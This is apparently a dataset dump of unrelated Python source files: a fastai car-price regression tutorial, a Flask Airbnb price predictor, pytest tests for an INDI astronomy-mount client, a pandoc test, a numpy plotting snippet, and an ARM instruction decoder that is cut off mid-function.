id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt

# Draw 10 samples from a logistic distribution centred at loc=1 with scale=2.
arr = np.random.logistic(loc=1, scale=2, size=10)
print(arr)

# DEFAULT parameters: loc=0, scale=1.
arr = np.random.logistic(size=1000)
# Fix: sns.distplot was deprecated and removed in recent seaborn releases;
# kdeplot draws the same density-only curve as distplot(arr, hist=False).
sns.kdeplot(arr)
plt.show()
| StarcoderdataPython |
3255010 | <filename>A_HANDS-ON_GUIDE_TO_REGRESSION_WITH_FASTAI.py
# -*- coding: utf-8 -*-
"""Published-Regression_Using_Fastai.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/17VOQ78Wwj2ByP98M6ojhqpkq0usp3Udt
#Regression With Fastai
---
Published at Analytics India Magazine -- [A HANDS-ON GUIDE TO REGRESSION WITH FAST.AI](https://analyticsindiamag.com/a-hands-on-guide-to-regression-with-fast-ai/)
**Getting Started With Regression**
Regression With Fast.ai in 7 simple steps:
* Importing the libraries
* Creating a TabularList
* Initialising Neural Network
* Training the model
* Evaluating the model
* A simple analysis on the predictions of the validation set
* Predicting using the network
##Importing All Major Libraries
"""
import pandas as pd
import numpy as np
from fastai.tabular import *
"""**The fastai.tabular package includes all the modules that are necessary for processing tabular data.**
## Importing The Data
"""
#Reading the datasets from excel sheet
training_set = pd.read_excel("Data_Train.xlsx")
test_set = pd.read_excel("Data_Test.xlsx")
"""## Understanding The Data"""
training_set.head(5)
# Checking the number of rows
print("\n\nNumber of observations in the datasets :\n",'#' * 40)
print("\nTraining Set : ",len(training_set))
print("Test Set : ",len(test_set))
# checking the number of features in the Datasets
print("\n\nNumber of features in the datasets :\n",'#' * 40)
print("\nTraining Set : ",len(training_set.columns))
print("Test Set : ",len(test_set.columns))
# checking the features in the Datasets
print("\n\nFeatures in the datasets :\n",'#' * 40)
print("\nTraining Set : ", list(training_set.columns))
print("Test Set : ",list(test_set.columns))
# Checking the data types of features
print("\n\nDatatypes of features in the datasets :\n",'#' * 40)
print("\nTraining Set : ", training_set.dtypes)
print("\nTest Set : ",test_set.dtypes)
# checking for NaNs or empty cells
print("\n\nEmpty cells or Nans in the datasets :\n",'#' * 40)
print("\nTraining Set : ",training_set.isnull().values.any())
print("\nTest Set : ",test_set.isnull().values.any())
# checking for NaNs or empty cells by column
print("\n\nNumber of empty cells or Nans in the datasets :\n",'#' * 40)
print("\nTraining Set : ","\n", training_set.isnull().sum())
print("\nTest Set : ",test_set.isnull().sum())
#Displaying dataset information
print("\n\nInfo:\n",'#' * 40)
training_set.info()
"""### Exploring Categorical features"""
# Non categorical Features in The dataset
training_set.select_dtypes(['int','float']).columns
#Categotical Features in The Dataset
training_set.select_dtypes('object').columns
#The Unique values in each of the categorical features
all_brands = list(training_set.Name) + list(test_set.Name)
all_locations = list(training_set.Location) + list(test_set.Location)
all_fuel_types = list(training_set.Fuel_Type) + list(test_set.Fuel_Type)
all_transmissions = list(training_set.Transmission) + list(test_set.Transmission)
all_owner_types = list(training_set.Owner_Type) + list(test_set.Owner_Type)
print("\nNumber Of Unique Values In Name : \n ", len(set(all_brands)))
#print("\nThe Unique Values In Name : \n ", set(all_brands))
print("\nNumber Of Unique Values In Location : \n ", len(set(all_locations)))
print("\nThe Unique Values In Location : \n ", set(all_locations) )
print("\nNumber Of Unique Values In Fuel_Type : \n ", len(set(all_fuel_types)))
print("\nThe Unique Values In Fuel_Type : \n ", set(all_fuel_types) )
print("\nNumber Of Unique Values In Transmission : \n ", len(set(all_transmissions)))
print("\nThe Unique Values In Transmission : \n ", set(all_transmissions) )
print("\nNumber Of Unique Values In Owner_Type : \n ", len(set(all_owner_types)))
print("\nThe Unique Values In Owner_Type : \n ", set(all_owner_types) )
"""## Feature Generation And Dataset Restructuring"""
#Based on the information gathered from the data, lets simplify and restructure it.
def restructure(data):
    """Clean the raw used-car listing frame into a model-ready DataFrame.

    Transformations applied (result column order matches the original
    notebook):
      * ``Name`` is split into ``Brand`` (first token) and ``Model`` (rest).
      * ``Mileage``, ``Engine``, ``Power`` keep only their leading numeric
        token (float, int, float); unparseable entries become NaN.
      * ``New_Price`` NaNs become 0.0 and 'Cr' amounts are converted to
        Lakh (1 Cr = 100 Lakh).
      * ``Price`` is carried over only when present (training set).

    Parameters
    ----------
    data : pandas.DataFrame
        Raw dataset as read from the competition Excel files.

    Returns
    -------
    pandas.DataFrame
        Restructured copy; the input frame is NOT modified (the original
        version mutated the caller via ``fillna(inplace=True)``).
    """

    def _lead_number(value, cast):
        # Parse the leading token of strings like '19.67 kmpl' / '998 CC'.
        # Non-strings (NaN) and non-numeric tokens (e.g. 'null bhp') map to
        # NaN, matching the original bare-except behaviour.
        try:
            return cast(value.split(" ")[0].strip())
        except (AttributeError, ValueError, IndexError):
            return np.nan

    # Split 'Name' into brand and model, keeping both lists row-aligned even
    # when a name is missing/non-string. (The original skipped such rows,
    # which would break the DataFrame construction below with a length
    # mismatch.)
    brand, model = [], []
    for i, name in enumerate(data.Name):
        try:
            tokens = name.split(" ")
            brand.append(tokens[0])
            model.append(" ".join(tokens[1:]).strip())
        except AttributeError:
            print("ERR ! - ", name, "@", i)
            brand.append(np.nan)
            model.append(np.nan)

    mileage = [_lead_number(v, float) for v in data.Mileage]
    engine = [_lead_number(v, int) for v in data.Engine]
    power = [_lead_number(v, float) for v in data.Power]

    # Normalize New_Price to a numeric amount in Lakh; missing values -> 0.0.
    newp = []
    for value in data['New_Price'].fillna(0):
        if value == 0:
            newp.append(float(value))
        elif 'Cr' in value:
            newp.append(float(value.split()[0].strip()) * 100)
        elif 'Lakh' in value:
            newp.append(float(value.split()[0].strip()))
        else:
            # Unknown unit: kept unchanged (matches original behaviour).
            newp.append(value)

    # Materialize columns as plain lists so the result is positionally
    # aligned even if `data` carries a non-default index.
    restructured = pd.DataFrame({'Brand': brand,
                                 'Model': model,
                                 'Location': list(data['Location']),
                                 'Year': list(data['Year']),
                                 'Kilometers_Driven': list(data['Kilometers_Driven']),
                                 'Fuel_Type': list(data['Fuel_Type']),
                                 'Transmission': list(data['Transmission']),
                                 'Owner_Type': list(data['Owner_Type']),
                                 'Mileage': mileage,
                                 'Engine': engine,
                                 'Power': power,
                                 'Seats': list(data['Seats']),
                                 'New_Price': newp
                                 })
    # Only the training frame carries the target column.
    if 'Price' in data.columns:
        restructured['Price'] = list(data['Price'])
    return restructured
"""**Summary:**
The data is restructured in the following ways:
1. The Name column in the original dataset is split in to two features, Brand and Model.
1. The Mileage column is cleaned to have float values.
1. The Engine column is cleaned to have integer values.
2. The Power column is cleaned to have integer values.
2. The New_Price column is cleaned to remove nulls and correct the units.
"""
#Restructuring Training and Test sets
train_data = restructure(training_set)
test_data = restructure(test_set)
#the dimensions of the training set
train_data.shape
#the dimensions of the test set
test_data.shape
#Top 5 rows of the training set
train_data.head(5)
#Top 5 rows of the test set
test_data.head()
"""## Regression With Fast.ai
###Creating A TabularList
TabularList in fastai is the basic ItemList for any kind of tabular data.It is a class to create a list of inputs in items for tabular data.
Main Arguments:
cat_names : The categorical features in the data.
cont_names : The continuous features in the data.
procs : A list of transformations to be applied to the data such as FillMissing, Categorify, Normalize etc.
"""
#Defining the keyword arguments for fastai's TabularList
#Path / default location for saving/loading models
path = ''
#The dependent variable/target
dep_var = 'Price'
#The list of categorical features in the dataset
cat_names = ['Brand', 'Model', 'Location', 'Fuel_Type', 'Transmission', 'Owner_Type']
#The list of continuous features in the dataset
#Exclude the Dependent variable 'Price'
cont_names =['Year', 'Kilometers_Driven', 'Mileage', 'Engine', 'Power', 'Seats', 'New_Price']
#List of Processes/transforms to be applied to the dataset
procs = [FillMissing, Categorify, Normalize]
# Start index for creating a validation set from train_data
# (the last 20% of the training rows are held out).
start_indx = len(train_data) - int(len(train_data) * 0.2)
# End index for creating a validation set from train_data
end_indx = len(train_data)
# TabularList for Validation
# NOTE(review): `val` is built without `procs` and is never consumed by the
# databunch below (the name is later rebound to a DataFrame) -- confirm
# whether this statement can be removed.
val = (TabularList.from_df(train_data.iloc[start_indx:end_indx].copy(), path=path, cat_names=cat_names, cont_names=cont_names))
test = (TabularList.from_df(test_data, path=path, cat_names=cat_names, cont_names=cont_names, procs=procs))
# TabularList for training: split off the validation rows by index, label
# with the target column, attach the test list, and bundle into a DataBunch.
data = (TabularList.from_df(train_data, path=path, cat_names=cat_names, cont_names=cont_names, procs=procs)
        .split_by_idx(list(range(start_indx, end_indx)))
        .label_from_df(cols=dep_var)
        .add_test(test)
        .databunch())
"""**Summary:**
1. Initializing/Setting The parameters for TabularList such as path, dep_var, cat_names, cont_names and procs.
1. Setting the index for Validation set. The start index and End index are set in such a away that it takes the last 20% data from the training set for validation.
2. Creating TabularList for Validation set from train_data.
2. Creating TabularList for Test set from test_data.
1. Creating a DataBunch for the network.DataBunch is a class that binds train_dl,valid_dl and test_dl in a data object.
"""
#Display the data batch
data.show_batch(rows = 10)
"""###Initializing Neural Network"""
#Initializing the network
learn = tabular_learner(data, layers=[300,200, 100, 50], metrics= [rmse,r2_score])
"""The above line of code will initialize a neural network with 4 layers and the number of nodes in each layer as 300,200, 100 and 50 respectively.
The network will use two primary metrics for evaluation:
* Root Mean Squared Error(RMSE)
* R-Squared
"""
#Show the complete Summary of the model
learn.summary
"""###Training The Network"""
learn.lr_find(start_lr = 1e-05,end_lr = 1e+05, num_it = 100)
learn.recorder.plot()
"""Learning rate is a hyper-parameter that controls how much the weights of the network is being adjusted with respect the loss gradient.
The lr_find method helps explore the learning rate in a specified range. The graph shows the deviation in loss with respect to the learning rate.
"""
#Fitting data and training the network
learn.fit_one_cycle(25)
"""**The above line trains the network for 25 epochs.**
### Evaluating Performance
"""
#Display Predictions On Training Data
learn.show_results(ds_type=DatasetType.Train,rows = 5)
#Display Predictions On Validation Data
learn.show_results(ds_type=DatasetType.Valid)
#Getting The Training And Validation Errors
tr = learn.validate(learn.data.train_dl)
va = learn.validate(learn.data.valid_dl)
print("The Metrics used In Evaluating The Network:", str(learn.metrics))
print("\nThe calculated RMSE & R-Squared For The Training Set :", tr[1:])
print("\nThe calculated RMSE & R-Squared For The Validation Set :", va[1:])
"""Summary:
The Root Mean Squared Error is the standard deviation of the errors/residuals. It tells us the 'Goodness Of Fit' of a model. The lower the value of RMSE the better the model.
The R-Squared metric also called the coefficient of determination is used to understand the variation in the dependent variable(y) and the independent variable(X).The closer the value of R-Squared is to one, the better the model.
**The above output suggests that:**
**The model/network was able to attain an RMSE of 1.4678 and an R_squared of 0.9726 while training and an RMSE of 3.1737 and an R_squared of 0.9107 while Validating on the validation set.**
"""
#Plotting The losses for training and validation
learn.recorder.plot_losses()
"""The above graph shows the change is loss during the course of training the network. At the beginning of the training we can see a high loss value. As the networks learned from the data, the loss started to drop until it could no longer improve during the course of training.
The validation shows a relatively consistent and low loss values.
**Note :**
The validation losses are only calculated once per epoch, whereas training losses are calculated after
"""
#Plotting Momentum & Learning Rate
learn.recorder.plot_lr(show_moms=True)
"""The above plots learning rate and momentum during the course of training."""
#Plotting the metrics of evaluation
learn.recorder.plot_metrics()
"""The decreasing RMSE and increasing R-Squared depicts the Goodness Of Fit.
### Exploring Validation Predictions
"""
val = train_data.tail(1203)
#Converting the prediction to DataFrame for Comparing
val_preds = learn.get_preds(ds_type=DatasetType.Valid)[0]
val_preds = [i[0] for i in val_preds.tolist()]
val['Predicted'] = val_preds
val.head()
"""#### Calculating RMLSE For Validation Predictions
Since the metric used in the hackathon for evaluating the predictions is RMSLE , we will calculate te same for the validation predictions to evaluate our model.
"""
import numpy as np
# Actual prices and model predictions on the held-out validation rows.
Y_true = val['Price']
pred = val['Predicted']
# RMSLE
# NOTE(review): RMSLE is conventionally computed with the natural log
# (np.log1p); base-10 logs are kept here as written -- confirm against the
# competition's scoring formula before changing.
error = np.square(np.log10(pred + 1) - np.log10(Y_true +1)).mean() ** 0.5
score = 1 - error
print("SCORE For Validation : ",score)
"""#### A Simple Analysis On Predictions"""
# Plotting The Average Price For A Given Car Brand, -- Actual vs Predicted
import matplotlib.pyplot as plt
plt.figure(figsize=(30, 3))
# Mean actual price per brand (solid) vs mean predicted price (dashed).
plt.plot(val.groupby(['Brand']).mean()['Price'], linewidth = 3, )
plt.plot(val.groupby(['Brand']).mean()['Predicted'],linewidth = 5, ls = '--')
plt.title('Average Price By Brands')
plt.xlabel('Brands')
plt.ylabel('Price In Lacs')
# NOTE(review): neither plot call passes `label=`, so this legend will be
# empty (and may warn) -- add labels or drop the call.
plt.legend()
plt.show()
"""The above graph shows comparison of the the average actual price by Brand and the predicted price."""
print("R-Squared For Validation Set : ", r2_score(learn.get_preds(ds_type=DatasetType.Valid)[0], learn.get_preds(ds_type=DatasetType.Valid)[1]))
print("\nRMSE For Validation Set : ",root_mean_squared_error(learn.get_preds(ds_type=DatasetType.Valid)[0], learn.get_preds(ds_type=DatasetType.Valid)[1]))
"""###Predicting For Test Data
####Predicting For A Single Row OF Test Set
"""
#Test set data for row 0
test_data.iloc[0]
#Prediction in float for Test set data for row 0
float(learn.predict(test_data.iloc[0])[1])
"""####Predicting For Test Set"""
# Predict on the fastai test set; get_preds returns (predictions, targets).
test_predictions = learn.get_preds(ds_type=DatasetType.Test)[0]
# Converting the tensor output to a list of predicted values
test_predictions = [i[0] for i in test_predictions.tolist()]
# Converting the predictions to a DataFrame with the expected column name
test_predictions = pd.DataFrame(test_predictions, columns = ['Price'])
# Writing the predictions to an excel file.
# Fix: the original wrote `predictions.to_excel(...)`, but no `predictions`
# name exists here -- it raised NameError.
test_predictions.to_excel("Fast_ai_solution.xlsx", index = False)
"""**Submit the above file [here](https://www.machinehack.com/course/predicting-the-costs-of-used-cars-hackathon-by-imarticus/leaderboard) to find out your score. Good Luck!**""" | StarcoderdataPython |
4835042 | <gh_stars>0
from flask import Flask, render_template, request
import pickle
import numpy as np
app=Flask(__name__)
loaded_model = pickle.load(open("nycairbnbmodel.pkl","rb"))
@app.route('/')
def home():
    """Render the landing page containing the prediction input form."""
    return render_template('home.html')
def ValuePredictor(to_predict_list):
    """Predict a nightly Airbnb price from a flat feature list.

    Parameters
    ----------
    to_predict_list : sequence of 49 numeric/boolean features, in the
        column order the pickled model was trained on.

    Returns
    -------
    str
        Predicted price formatted as '$<amount>' rounded to 2 decimals.
    """
    # The model expects a single-row 2-D array of 49 features.
    to_predict = np.array(to_predict_list).reshape(1, 49)
    result = loaded_model.predict(to_predict)
    # The target was log-transformed for training; np.expm1 inverts
    # e**x - 1 with better numerical accuracy than the explicit formula.
    result = np.expm1(result[0])
    return '$' + str(round(result, 2))
@app.route('/result', methods=['GET', 'POST'])
def result():
    """Handle the prediction form.

    On POST: one-hot encode the categorical form fields (neighbourhood,
    neighbourhood group, room type), merge them with the numeric and
    boolean fields, run the model via ValuePredictor and render the
    result page. On GET: show the input form again.
    """
    if request.method == 'POST':
        to_predict_dict = request.form.to_dict()
        to_predict_list = list(to_predict_dict.values())
        print(to_predict_dict)
        # One-hot encode the neighbourhood field.
        neighbourhood = ['Bedford-Stuyvesant', 'Bushwick', 'Chelsea', 'Clinton Hill', 'Crown Heights',
                         'East Flatbush', 'East Harlem', 'East Village', 'Financial District', 'Flatbush', 'Flushing',
                         'Fort Greene', 'Greenpoint', 'Harlem', "Hell's Kitchen", 'Kips Bay', 'Long Island City',
                         'Lower East Side', 'Midtown', 'Murray Hill', 'Park Slope', 'Prospect-Lefferts Gardens',
                         'Ridgewood', 'Sunset Park', 'Upper East Side', 'Upper West Side', 'Washington Heights',
                         'West Village', 'Williamsburg', 'other']
        neighbourhood_list = [1 if i == to_predict_dict['neighbourhood'] else 0 for i in neighbourhood]
        # One-hot encode the neighbourhood group.
        # NOTE(review): 'Manhatten' is misspelled but kept as-is because it
        # must match the value submitted by the HTML form -- confirm against
        # the template before correcting.
        neighbourhood_group = ['Bronx', 'Brooklyn', 'Manhatten', 'Queens', 'Staten Island']
        neighbourhood_group_list = [1 if i == to_predict_dict['neighbourhood_group'] else 0 for i in neighbourhood_group]
        # One-hot encode the room type.
        room_type = ['Entire Home/Apartment', 'Private Room', 'Shared Room']
        room_type_list = [1 if i == to_predict_dict['room_type'] else 0 for i in room_type]
        # Numeric features: the one-hot vectors plus the raw numeric fields.
        to_predict_list1 = neighbourhood_list + neighbourhood_group_list + room_type_list + to_predict_list[3:11]
        to_predict_list1 = list(map(float, to_predict_list1))
        # Boolean features: the last three form fields are Yes/No flags.
        to_predict_list2 = [True if i == 'Yes' else False for i in to_predict_list[-3:]]
        # Merge the 2 lists into the final model input.
        to_predict_list_final = to_predict_list1 + to_predict_list2
        print("Before sending to model", to_predict_list_final)
        print(loaded_model)
        result = ValuePredictor(to_predict_list_final)
        print("result from model", result)
        return render_template("result.html", result=result)
    # Fix: a plain GET previously fell through and returned None, which Flask
    # turns into a 500 error; show the input form instead.
    return render_template('home.html')
if __name__ == "__main__":
app.run(debug=True)
| StarcoderdataPython |
3394432 | """Tests for the lander.ext.parser.pandoc module's format conversion
functionality.
"""
from __future__ import annotations
from lander.ext.parser.pandoc import convert_text
def test_convert() -> None:
    # Pandoc should strip LaTeX emphasis markup when converting to plain
    # text (the trailing newline is part of pandoc's plain output).
    source = r"Hello \emph{world}"
    expected = "Hello world\n"
    assert expected == convert_text(
        content=source, source_fmt="latex", output_fmt="plain"
    )
| StarcoderdataPython |
3260538 | <gh_stars>10-100
############################################################
# -*- coding: utf-8 -*-
#
# # # # # # #
# ## ## # ## # #
# # # # # # # # # # #
# # ## # ## ## ######
# # # # # # #
#
# Python-based Tool for interaction with the 10micron mounts
# GUI with PyQT5 for python
#
# written in python3, (c) 2019-2021 by mworion
# Licence APL2.0
#
###########################################################
# standard libraries
from unittest import mock
# external packages
import pytest
import PyQt5
from PyQt5.QtTest import QTest
from indibase.indiBase import Device
from base.indiClass import IndiClass
# local import
from base import indiClass
from base.driverDataClass import Signals
host_ip = 'astro-mount.fritz.box'
class Signal(PyQt5.QtCore.QObject):
    # Minimal QObject stand-in for the application object: it only provides
    # the `message` signal that IndiClass emits status text on.
    message = PyQt5.QtCore.pyqtSignal(str, int)
class TestSignals(IndiClass):
    # Concrete IndiClass for testing, equipped with the Signals bundle the
    # driver-data interface expects as a class attribute.
    signals = Signals()

    def __init__(self, app=None, data=None, threadPool=None):
        # NOTE(review): this __init__ only forwards to the parent and could
        # be removed -- kept for explicitness.
        super().__init__(app=app, data=data, threadPool=threadPool)
@pytest.fixture(autouse=True, scope='function')
def module_setup_teardown():
    # Build a fresh TestSignals instance before every test. QTimer.start is
    # patched so no real timers run while the object is constructed.
    global app
    m = Signal()
    with mock.patch.object(PyQt5.QtCore.QTimer,
                           'start'):
        app = TestSignals(m)
    yield
def test_class_without_app():
    # Constructing IndiClass without an app must not raise. The original
    # test bound the instance to an unused local and asserted nothing.
    a = indiClass.IndiClass()
    assert a is not None
def test_properties():
app.deviceName = 'test'
assert app.deviceName == 'test'
app.host = ('localhost', 7624)
assert app.host == ('localhost', 7624)
app.hostaddress = 'localhost'
assert app.hostaddress == 'localhost'
app.port = 7624
assert app.port == 7624
def test_serverConnected_1():
app.deviceName = ''
suc = app.serverConnected()
assert not suc
def test_serverConnected_2():
app.deviceName = 'test'
with mock.patch.object(app.client,
'watchDevice',
return_value=True) as call:
suc = app.serverConnected()
assert suc
call.assert_called_with('test')
def test_serverDisconnected():
suc = app.serverDisconnected({'test': 'test'})
assert suc
def test_newDevice_1():
app.deviceName = 'false'
with mock.patch.object(app.client,
'getDevice',
return_value=None):
suc = app.newDevice('test')
assert suc
assert None is app.device
def test_newDevice_2():
app.deviceName = 'test'
with mock.patch.object(app.client,
'getDevice',
return_value=Device()):
suc = app.newDevice('test')
assert suc
assert app.device is not None
def test_removeDevice_1():
app.deviceName = 'test'
app.device = Device()
app.data = {'test': 1}
suc = app.removeDevice('foo')
assert not suc
def test_removeDevice_2():
app.deviceName = 'test'
app.device = Device()
app.data = {'test': 1}
suc = app.removeDevice('test')
assert suc
assert app.data == {}
assert app.device is None
def test_startRetry_1():
app.deviceName = ''
suc = app.startRetry()
assert not suc
def test_startRetry_2():
app.deviceName = 'test'
app.device = Device()
app.data = {}
suc = app.startRetry()
assert not suc
def test_startRetry_3():
app.deviceConnected = False
app.deviceName = 'test'
app.device = Device()
app.data = {}
with mock.patch.object(app.client,
'connectServer',
return_value=True):
suc = app.startRetry()
assert suc
assert not app.deviceConnected
def test_startRetry_4():
app.deviceConnected = False
app.deviceName = 'test'
app.device = Device()
app.data = {'test': 1}
with mock.patch.object(app.client,
'connectServer',
return_value=False):
suc = app.startRetry()
assert suc
assert app.deviceConnected
def test_startCommunication_1():
app.data = {}
with mock.patch.object(app.client,
'startTimers',
return_value=False):
with mock.patch.object(app.client,
'connectServer',
return_value=False):
with mock.patch.object(app.timerRetry,
'start'):
suc = app.startCommunication()
assert not suc
def test_startCommunication_2():
app.data = {}
with mock.patch.object(app.client,
'startTimers',
return_value=False):
with mock.patch.object(app.client,
'connectServer',
return_value=True):
with mock.patch.object(app.timerRetry,
'start'):
suc = app.startCommunication()
assert suc
def test_stopCommunication_1():
with mock.patch.object(app.client,
'stopTimers',
return_value=False):
with mock.patch.object(app.client,
'disconnectServer',
return_value=False):
suc = app.stopCommunication()
assert not suc
def test_stopCommunication_2():
with mock.patch.object(app.client,
'stopTimers',
return_value=False):
with mock.patch.object(app.client,
'disconnectServer',
return_value=True):
suc = app.stopCommunication()
assert suc
def test_connectDevice1():
with mock.patch.object(app.client,
'connectDevice',
return_value=False):
suc = app.connectDevice('test', 'test')
assert not suc
def test_connectDevice2():
with mock.patch.object(app.client,
'connectDevice',
return_value=False):
suc = app.connectDevice('test', 'CONNECTION')
assert not suc
def test_connectDevice3():
app.deviceName = 'test'
with mock.patch.object(app.client,
'connectDevice',
return_value=True):
suc = app.connectDevice('test', 'CONNECTION')
assert suc
def test_connectDevice4():
app.deviceName = 'test'
with mock.patch.object(app.client,
'connectDevice',
return_value=False):
suc = app.connectDevice('test', 'CONNECTION')
assert not suc
def test_loadDefaultConfig_1():
app.loadIndiConfig = False
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'test': 1}):
suc = app.loadConfig('test')
assert not suc
def test_loadDefaultConfig_2():
app.loadIndiConfig = True
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'test': 1}):
with mock.patch.object(app.client,
'sendNewSwitch',
return_value=False):
suc = app.loadConfig('test')
assert not suc
def test_loadDefaultConfig_3():
app.loadIndiConfig = True
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'test': 1}):
with mock.patch.object(app.client,
'sendNewSwitch',
return_value=True):
suc = app.loadConfig('test')
assert suc
def test_setUpdateConfig():
app.setUpdateConfig('test')
def test_convertIndigoProperty_1():
app.INDIGO = {'test': 'test1'}
val = app.convertIndigoProperty('test')
assert val == 'test1'
def test_updateNumber_1():
suc = app.updateNumber('telescope', 'test')
assert not suc
def test_updateNumber_2():
app.device = Device()
suc = app.updateNumber('telescope', 'test')
assert not suc
def test_updateNumber_3():
app.data = {}
app.device = Device()
app.deviceName = 'telescope'
with mock.patch.object(app.device,
'getNumber',
return_value={'test': 1}):
suc = app.updateNumber('telescope', 'test')
assert suc
def test_updateText_1():
suc = app.updateText('telescope', 'test')
assert not suc
def test_updateText_2():
app.device = Device()
suc = app.updateText('telescope', 'test')
assert not suc
def test_updateText_3():
app.data = {}
app.device = Device()
app.deviceName = 'telescope'
with mock.patch.object(app.device,
'getText',
return_value={'test': 1}):
suc = app.updateText('telescope', 'test')
assert suc
def test_updateSwitch_1():
suc = app.updateSwitch('telescope', 'test')
assert not suc
def test_updateSwitch_2():
app.device = Device()
suc = app.updateSwitch('telescope', 'test')
assert not suc
def test_updateSwitch_3():
app.data = {}
app.device = Device()
app.deviceName = 'telescope'
with mock.patch.object(app.device,
'getSwitch',
return_value={'test': 1}):
suc = app.updateSwitch('telescope', 'test')
assert suc
def test_updateSwitch_4():
app.data = {}
app.device = Device()
app.deviceName = 'telescope'
with mock.patch.object(app.device,
'getSwitch',
return_value={'test': 1}):
suc = app.updateSwitch('telescope', 'PROFILE')
assert suc
def test_updateLight_1():
suc = app.updateLight('telescope', 'test')
assert not suc
def test_updateLight_2():
app.device = Device()
suc = app.updateLight('telescope', 'test')
assert not suc
def test_updateLight_3():
app.data = {}
app.device = Device()
app.deviceName = 'telescope'
with mock.patch.object(app.device,
'getLight',
return_value={'test': 1}):
suc = app.updateLight('telescope', 'test')
assert suc
def test_updateBLOB_1():
suc = app.updateBLOB('telescope', 'test')
assert not suc
def test_updateBLOB_2():
app.device = Device()
suc = app.updateBLOB('telescope', 'test')
assert not suc
def test_updateBLOB_3():
app.device = Device()
app.deviceName = 'telescope'
suc = app.updateBLOB('telescope', 'test')
assert suc
def test_removePrefix_1():
value = app.removePrefix('', '')
assert value == ''
def test_removePrefix_2():
value = app.removePrefix('NOT should not be shown', 'NOT')
assert value == 'should not be shown'
def test_updateMessage_1():
app.showMessages = False
suc = app.updateMessage('test', 'text')
assert not suc
def test_updateMessage_2():
app.showMessages = True
suc = app.updateMessage('test', 'text')
assert suc
def test_updateMessage_3():
app.showMessages = True
suc = app.updateMessage('test', '[WARNING] should not be shown')
assert suc
def test_updateMessage_4():
app.showMessages = True
suc = app.updateMessage('test', '[ERROR] should not be shown')
assert suc
def test_updateMessage_5():
app.showMessages = True
suc = app.updateMessage('test', 'NOT should not be shown')
assert suc
def test_addDiscoveredDevice_1(qtbot):
device = Device()
app.indiClass = IndiClass()
with mock.patch.object(device,
'getText',
return_value={'DRIVER_INTERFACE': None}):
suc = app.addDiscoveredDevice('telescope', 'test')
assert not suc
def test_addDiscoveredDevice_2(qtbot):
app.indiClass = IndiClass()
app.indiClass.client.devices['telescope'] = {}
suc = app.addDiscoveredDevice('telescope', 'DRIVER_INFO')
assert not suc
def test_addDiscoveredDevice_3(qtbot):
device = Device()
app.indiClass = IndiClass()
app.client.devices['telescope'] = device
app.discoverType = None
with mock.patch.object(device,
'getText',
return_value={}):
suc = app.addDiscoveredDevice('telescope', 'DRIVER_INFO')
assert not suc
def test_addDiscoveredDevice_4(qtbot):
device = Device()
app.indiClass = IndiClass()
app.client.devices['telescope'] = device
app.discoverType = None
app.discoverList = list()
with mock.patch.object(device,
'getText',
return_value={'DRIVER_INTERFACE': '0'}):
suc = app.addDiscoveredDevice('telescope', 'DRIVER_INFO')
assert not suc
def test_addDiscoveredDevice_5(qtbot):
device = Device()
app.indiClass = IndiClass()
app.client.devices['telescope'] = device
app.discoverType = 1
app.discoverList = list()
with mock.patch.object(device,
'getText',
return_value={'DRIVER_INTERFACE': 1}):
suc = app.addDiscoveredDevice('telescope', 'DRIVER_INFO')
assert suc
def test_discoverDevices_1():
with mock.patch.object(QTest,
'qWait'):
val = app.discoverDevices('dome')
assert val == []
| StarcoderdataPython |
3304768 | from and_register_shifted_register_a1 import AndRegisterShiftedRegisterA1
from eor_register_shifted_register_a1 import EorRegisterShiftedRegisterA1
from sub_register_shifted_register_a1 import SubRegisterShiftedRegisterA1
from rsb_register_shifted_register_a1 import RsbRegisterShiftedRegisterA1
from add_register_shifted_register_a1 import AddRegisterShiftedRegisterA1
from adc_register_shifted_register_a1 import AdcRegisterShiftedRegisterA1
from sbc_register_shifted_register_a1 import SbcRegisterShiftedRegisterA1
from rsc_register_shifted_register_a1 import RscRegisterShiftedRegisterA1
from tst_register_shifted_register_a1 import TstRegisterShiftedRegisterA1
from teq_register_shifted_register_a1 import TeqRegisterShiftedRegisterA1
from cmp_register_shifted_register_a1 import CmpRegisterShiftedRegisterA1
from cmn_register_shifted_register_a1 import CmnRegisterShiftedRegisterA1
from orr_register_shifted_register_a1 import OrrRegisterShiftedRegisterA1
from lsl_register_a1 import LslRegisterA1
from lsr_register_a1 import LsrRegisterA1
from asr_register_a1 import AsrRegisterA1
from ror_register_a1 import RorRegisterA1
from bic_register_shifted_register_a1 import BicRegisterShiftedRegisterA1
from mvn_register_shifted_register_a1 import MvnRegisterShiftedRegisterA1
def decode_instruction(instr):
    """Map an ARM data-processing (register-shifted register) encoding to its class.

    `instr` appears to be a bit-string (it is compared against "0b..."
    prefixes); instr[7:11] / instr[7:12] select the opcode bits and
    instr[25:27] the shift-type bits for the shift instructions -- TODO
    confirm the exact bit layout against the caller that builds `instr`.

    Returns the matching instruction class, or (implicitly) None when no
    encoding matches. The elif order is significant: the 5-bit compare/test
    prefixes (10001..10111) are disjoint from the 4-bit arithmetic prefixes.
    """
    if instr[7:11] == "0b0000":
        # Bitwise AND
        return AndRegisterShiftedRegisterA1
    elif instr[7:11] == "0b0001":
        # Bitwise Exclusive OR
        return EorRegisterShiftedRegisterA1
    elif instr[7:11] == "0b0010":
        # Subtract
        return SubRegisterShiftedRegisterA1
    elif instr[7:11] == "0b0011":
        # Reverse Subtract
        return RsbRegisterShiftedRegisterA1
    elif instr[7:11] == "0b0100":
        # Add
        return AddRegisterShiftedRegisterA1
    elif instr[7:11] == "0b0101":
        # Add with Carry
        return AdcRegisterShiftedRegisterA1
    elif instr[7:11] == "0b0110":
        # Subtract with Carry
        return SbcRegisterShiftedRegisterA1
    elif instr[7:11] == "0b0111":
        # Reverse Subtract with Carry
        return RscRegisterShiftedRegisterA1
    elif instr[7:12] == "0b10001":
        # Test
        return TstRegisterShiftedRegisterA1
    elif instr[7:12] == "0b10011":
        # Test Equivalence
        return TeqRegisterShiftedRegisterA1
    elif instr[7:12] == "0b10101":
        # Compare
        return CmpRegisterShiftedRegisterA1
    elif instr[7:12] == "0b10111":
        # Compare Negative
        return CmnRegisterShiftedRegisterA1
    elif instr[7:11] == "0b1100":
